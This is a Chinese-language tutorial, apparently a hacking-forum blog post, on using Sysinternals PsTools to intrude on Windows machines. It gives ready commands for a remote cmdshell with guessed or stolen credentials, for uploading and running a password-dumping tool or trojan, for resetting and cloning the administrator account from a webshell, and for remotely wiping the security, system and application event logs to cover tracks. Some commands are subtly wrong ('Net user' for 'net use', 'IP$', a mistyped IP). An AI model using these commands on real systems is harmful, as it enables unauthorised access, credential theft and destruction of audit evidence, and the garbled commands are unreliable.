pstools套件在滲透中的應用詳解
其實接觸pstool很久了,但是據我觀察用pstools套件在滲透中的應用的介紹卻比較少。
當然玩bt5的同學可能常常用到,小菜就寫一篇關于pstools套件在滲透中的應用進行詳解。
pstool的介紹
PsTools是Sysinternals Suite中一款排名靠前的一個安全管理工具套件。現在被微軟收購。目前pstools中含有12款各式各樣的小工具。如果將它們靈活的運用,將會在滲透中收到奇效。所有的pstool第一次運行時都會彈框。可以用–accepteula這個參數繞過。
還有所有的pstool都支持IP$,一旦IP$共享是連接的就不用輸入-u 和-p這兩個參數。
如何建立IP$連接。命令如下:
Net user \\目標ip\ 密碼 /user:用戶
Net user \\192.168.1.3\ 123456 /user:test
建立后所有的ps工具都將可以不用輸入用戶和密碼了。
其中12款工具簡介如下:
◆PsExec - 遠程執行進程
◆PsFile - 顯示遠程打開的文件
◆PsGetSid - 顯示計算機或用戶的 SID
◆PsInfo - 列出有關系統的信息
◆PsKill - 按名稱或進程 ID 終止進程
◆PsList - 列出有關進程的詳細信息
◆PsLoggedOn - 查看在本地通過資源共享(包含所有資源)登錄的用戶
◆PsLogList - 轉儲事件日志記錄
◆PsPasswd - 更改帳戶密碼
◆PsService - 查看和控制服務
◆PsShutdown - 關閉并重新啟動(可選)計算機
◆PsSuspend - 暫停進程
這里講對其中的幾個工具進行詳解,其他的將只介紹用法。
下載地址:http://download.sysinternals.com/files/PSTools.zip
psexec的應用詳解
Pstools中最強大最常利用的工具就屬psexec這款工具。這款工具的本意是替代telnet這種不安全的管理方式。它最大的特點就屬無需安裝客服端程序就可以遠程操作服務器。
簡單來說,就是一旦你知道服務器或者電腦的用戶名和密碼,你就可以利用它遠程執行系統命令。這樣一款工具放到滲透當中真是太淫蕩了。它適用于windows NT/2x/xp/vista
下面介紹詳細參數:
-u 遠程計算機的用戶名
-p 遠程計算機用戶對應密碼
-c <[路徑]文件名>:拷貝文件到遠程機器并運行(注意:運行結束后文件會自動刪除)
-d 不等待程序執行完就返回 (意思就是,當你執行一個程序無需等到他結束才返回信息)
-h用于目標系統是Vista或更高版本
其他參數就不做介紹,這里主要是講用法。
遠程獲取一個cmdshell
比如我再滲透中掃描到目標機(192.168.1.3)的一個用戶名(test)和密碼(123456)。
那我們的命令就是:
psexec \\目標ip -u 用戶名 -p 密碼 進程名
psexec \\192.168.1.3 –u test –p 123456 cmd.exe
看下圖,這是成功連接到一臺遠程服務器,并獲得一個cmdshell,shell權限即位當前用戶權限。
這里還將提到的是由于windows策略,將不允許空密碼登陸。
可能有些機油對用戶權限登陸還有疑慮,什么用戶才可以登陸。
我這建立了一個屬于guest的一個用戶我們來看看它是否能連接。
經過測試,比guest權限大的用戶組都可以遠程登陸。
IIS_WPG用戶組的無法遠程連接,但是你不用擔心,一般屬于IIS_WPG用戶組的用戶一般也屬于guest用戶組。
有關用戶組相關的介紹請圍觀法客周年慶之提權專題
下載地址: http://www.2cto.com/ebook/201211/35554.html
獲取cmdshell的介紹就到這里。一旦獲得一個cmdshell后面的滲透將會比較輕松。
經過測試,用最新版的pstools,windows2008 win7 都能連接成功,win8由于沒有win8系統,就未測試,應該是能行的,畢竟這是微軟的管理工具。
Win7連接示意圖:
程序上傳并執行
首先現在在本地配置一個將上傳到服務器上運行的程序到H盤根目錄。這里用抓取系統密碼的神器getpass來演示。H:\getpass.exe
程序上傳并執行命令如下:
Psexec \\192.169.1.3 –u test –p 12345 –c H:\getpass.exe –d
最后一個-d的參數可有可無~~~
只是怕程序遠程運行后會卡住而無法返回信息。
測試如圖:
當然你也可運行一個遠控木馬這些都可以~~~
Psexec 的介紹就到這里了。
pspasswd的應用詳解
Pspasswd是一個用來更改用戶密碼的工具,支持遠程密碼修改和本地密碼修改。這款工具的特點就是不依靠net,exe程序進行密碼修改。
本地修改命令如下:
pspasswd administrator yueyan
演示圖如下:
遠程命令如下:
pspasswd \\192.168.1.3 –u administrator –p 123456 guest yueyan
命令的意思就是,用administrator這個管理員賬戶登錄后修改用戶guest的密碼為yueyan
相對來說本地修改密碼的功能更強大一些。
我這將介紹個實例:
我的一個好基友Lynn得到一個jsp馬,并且是nt authority\system權限。但是無法添加用戶,且無法用net修改管理員密碼。抓取hash密碼大于14位,LMhash無效,本地又為搭建彩虹表,網上破解無果。Hash傳遞登陸被攔截。但是機油lynn卻一直想用administrator這個用戶登陸進去,當然方法還有很多,比如: mimikatz.exe抓取明文密碼等,這里我將介紹pspasswd的妙用。
我們想用administrator這個賬戶登陸進去。很簡單,直接上傳一個pspasswd上服務器。
執行下面的命令:
首先執行D:\web|pspasswd.exe –accepteula (第一次執行,表示許可執行的意思)
D:\web|pspasswd.exe administrator yueyan
就會成功修改administrator的密碼。
這里能修改密碼的原因是pspasswd不是調用net.exe進行密碼修改。
上述介紹常常配合mt.exe進行用戶克隆。這里簡單介紹:
(關于mt.exe的詳細介紹請訪問:【工具】mt.exe的詳細介紹)
首先mt.exe查看用戶sid,比較后看是否有克隆賬戶
Mt -chkuser
比較后,沒有克隆賬戶,我們選擇guest這個賬戶進行克隆:
Mt –clone administrator guest
然后配合pspasswd修改密碼:
Pspasswd guest yueyan
就這樣成功克隆一個賬戶,并能成功登陸訪問。
Pspasswd的功能就介紹到這里。
pskill+psinfo+pslist的應用詳解
首先是介紹pskill.
如果你想遠程結束遠程主機上的一個進程,你可以使用pskill。
我們就介紹一下常用的命令:
比如我們想遠程關閉遠程主機正在運行的cmd這個進程,可以用pskill進行殺掉。命令如下:
pskill \\192.168.1.3 –u test –p 123456 cmd.exe
命令很簡單~~~~
我再介紹psinfo的相關應用。
基本參數是:
-h 顯示已經安裝的補丁信息
-s 顯示已安裝的軟件信息
-d 顯示磁盤信息
如果我們想看遠程主機的基本信息,命令如下:
psinfo –h –s –d \\192.168.1.3 –u administrator –p 123456
接下來就是pslist。
主要特點是,顯示本地或者遠程計算機的進程運行情況。
主要參數:
-m 顯示內存信息
-x 顯示進程,內存和線程
-t 顯示進程樹
-s n 在任務管理器模式先運行,n指定秒,以esc結束。
-r n 任務管理器模式刷新速率,n指秒
例如我們想看遠程計算機的進程運行情況,命令如下:
Pslist –x \\192.168.1.3 –u test –p 123456
效果圖如下:
其他ps工具介紹:
PSLOGGEDON:查看指定計算機的本地及遠程登錄的用戶和登錄時間。必須建立在IP$共享下才可以使用這個工具。
命令如下:
Psloggedon –l \\192.168.1.3
PSLOGLIST:事件日志轉儲及管理。
這個對于滲透測試是非常有用的,它最大的特點就是遠程清理系統日志。
常用:
psloglist \\72.56.17.74 application -c > nul
psloglist \\72.56.17.74 system -c > nul
psloglist \\72.56.17.74 security -c > nul
分別是清理應用程序日志,系統運行日志,安全日志。
PSSERVICE:管理服務。
常用:
psservice query messenger
查詢messenger服務的相關信息。
最重要的項目是:服務名稱、顯示名稱、服務描述、服務類型、服務狀態。
psservice config messenger
查詢服務的配置信息。
最重要的項目是:服務名稱、服務描述、服務類型、服務啟動類型、服務錯誤控制級別、可執行文件的路徑等等。
PSSHUTDOWN:關機工具。
常用命令:
Psshutdown –s –t 60
60秒后關機。
下面幾個不常用,就介紹下:
PsFile - 顯示遠程打開的文件
Psfile \\192.168.1.3
PsGetSid - 顯示計算機或用戶的 SID
Psgetsid \\192.168.1.3
PsSuspend - 暫停進程
Pssuspend \\192.168.1.3 –u test –p 123456 cmd,exe
